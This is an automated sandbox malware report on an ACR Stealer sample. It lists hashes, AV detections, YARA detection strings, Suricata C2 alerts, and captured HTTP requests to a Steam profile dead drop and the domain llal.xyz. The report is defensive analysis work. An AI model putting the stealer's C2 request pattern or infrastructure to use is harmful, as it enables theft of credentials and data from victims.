Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OXoeX1Ii3x.exe

Overview

General Information

Sample name:OXoeX1Ii3x.exe
renamed because original name is a hash value
Original sample name:3e9881b9c6ff4994fc9d684456694e77.exe
Analysis ID:1582973
MD5:3e9881b9c6ff4994fc9d684456694e77
SHA1:370244669daea5f87c797d6ad240adbfb7006384
SHA256:a35599ceb0a707d21515a6813b699a86ef0bef98fb42b804274640df2cef4879
Tags:exeuser-abuse_ch
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
One or more processes crash
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • OXoeX1Ii3x.exe (PID: 4396 cmdline: "C:\Users\user\Desktop\OXoeX1Ii3x.exe" MD5: 3E9881B9C6FF4994FC9D684456694E77)
    • WerFault.exe (PID: 5064 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4396 -s 1932 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
OXoeX1Ii3x.exeinfostealer_win_acrstealer_strFinds ACR Stealer standalone samples based on specific strings.Sekoia.io
  • 0x4f710:$str01: ref.txt
  • 0x4e348:$str02: Wininet.dll
  • 0x4e3c4:$str03: Content-Type: application/octet-stream; boundary=----
  • 0x4e40c:$str04: POST
  • 0x4e484:$str05: os_c
  • 0x4e48c:$str06: en_k
  • 0x4f734:$str07: MyApp/1.0
  • 0x4e5c4:$str08: /Up/b
  • 0x50018:$str10: /ujs/
  • 0x5006c:$str11: /Up/
  • 0x50040:$str12: ostr
  • 0x50048:$str13: brCH
  • 0x50050:$str14: brGk
  • 0x4e43c:$str15: https://steamcommunity.com/profiles/

Unpacked PEs

SourceRuleDescriptionAuthorStrings
0.2.OXoeX1Ii3x.exe.200000.0.unpackinfostealer_win_acrstealer_strFinds ACR Stealer standalone samples based on specific strings.Sekoia.io
  • 0x4f710:$str01: ref.txt
  • 0x4e348:$str02: Wininet.dll
  • 0x4e3c4:$str03: Content-Type: application/octet-stream; boundary=----
  • 0x4e40c:$str04: POST
  • 0x4e484:$str05: os_c
  • 0x4e48c:$str06: en_k
  • 0x4f734:$str07: MyApp/1.0
  • 0x4e5c4:$str08: /Up/b
  • 0x50018:$str10: /ujs/
  • 0x5006c:$str11: /Up/
  • 0x50040:$str12: ostr
  • 0x50048:$str13: brCH
  • 0x50050:$str14: brGk
  • 0x4e43c:$str15: https://steamcommunity.com/profiles/
0.0.OXoeX1Ii3x.exe.200000.0.unpackinfostealer_win_acrstealer_strFinds ACR Stealer standalone samples based on specific strings.Sekoia.io
  • 0x4f710:$str01: ref.txt
  • 0x4e348:$str02: Wininet.dll
  • 0x4e3c4:$str03: Content-Type: application/octet-stream; boundary=----
  • 0x4e40c:$str04: POST
  • 0x4e484:$str05: os_c
  • 0x4e48c:$str06: en_k
  • 0x4f734:$str07: MyApp/1.0
  • 0x4e5c4:$str08: /Up/b
  • 0x50018:$str10: /ujs/
  • 0x5006c:$str11: /Up/
  • 0x50040:$str12: ostr
  • 0x50048:$str13: brCH
  • 0x50050:$str14: brGk
  • 0x4e43c:$str15: https://steamcommunity.com/profiles/

Sigma Signatures

No Sigma rule has matched

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-01T09:12:06.422346+010020526741A Network Trojan was detected192.168.2.549705188.114.96.3443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-01T09:12:05.545826+010028032702Potentially Bad Traffic192.168.2.549704104.102.49.254443TCP
2025-01-01T09:12:06.422346+010028032702Potentially Bad Traffic192.168.2.549705188.114.96.3443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus / Scanner detection for submitted sample
Source: OXoeX1Ii3x.exeAvira: detected
Multi AV Scanner detection for submitted file
Source: OXoeX1Ii3x.exeVirustotal: Detection: 52%Perma Link
Source: OXoeX1Ii3x.exeReversingLabs: Detection: 68%
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for sample
Source: OXoeX1Ii3x.exeJoe Sandbox ML: detected
Source: OXoeX1Ii3x.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, REMOVABLE_RUN_FROM_SWAP
Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: OXoeX1Ii3x.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_0023576B FindFirstFileExW,0_2_0023576B
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_00207A82 __EH_prolog3_GS,FindFirstFileA,PathMatchSpecA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,FindClose,FindClose,0_2_00207A82

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2052674 - Severity 1 - ET MALWARE ACR Stealer CnC Checkin Attempt : 192.168.2.5:49705 -> 188.114.96.3:443
Performs DNS queries to domains with low reputation
Source: DNS query: llal.xyz
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49705 -> 188.114.96.3:443
Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49704 -> 104.102.49.254:443
Source: global trafficHTTP traffic detected: GET /profiles/76561199619938930 HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: steamcommunity.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: llal.xyzCache-Control: no-cache
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\OXoeX1Ii3x.exeCode function: 0_2_002173CD InternetOpenUrlA,InternetReadFile,0_2_002173CD
Source: global trafficHTTP traffic detected: GET /profiles/76561199619938930 HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: steamcommunity.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /ujs/2ae977f4-db12-4876-9e4d-fc8d1778842d HTTP/1.1User-Agent: Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603Host: llal.xyzCache-Control: no-cache
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;eE< equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
Source: global trafficDNS traffic detected: DNS query: llal.xyz
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowerW
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
Source: 76561199619938930[1].htm.0.drString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: OXoeX1Ii3x.exe, 00000000.00000002.2506019196.000000000339F000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033C3000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033D8000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000002.2506019196.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029933806.00000000033DA000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E2000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&am
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&amp;l
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&amp;l=engl
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=english&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&amp;l=english&a
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&amp;l=en
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&amp;l=eng
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=e
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029760130.00000000033E9000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029802091.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003425000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029897985.0000000003436000.00000004.00000020.00020000.00000000.sdmp, OXoeX1Ii3x.exe, 00000000.00000003.2029736703.0000000003426000.00000004.00000020.00020000.00000000.sdmp, 76561199619938930[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&amp;l=e
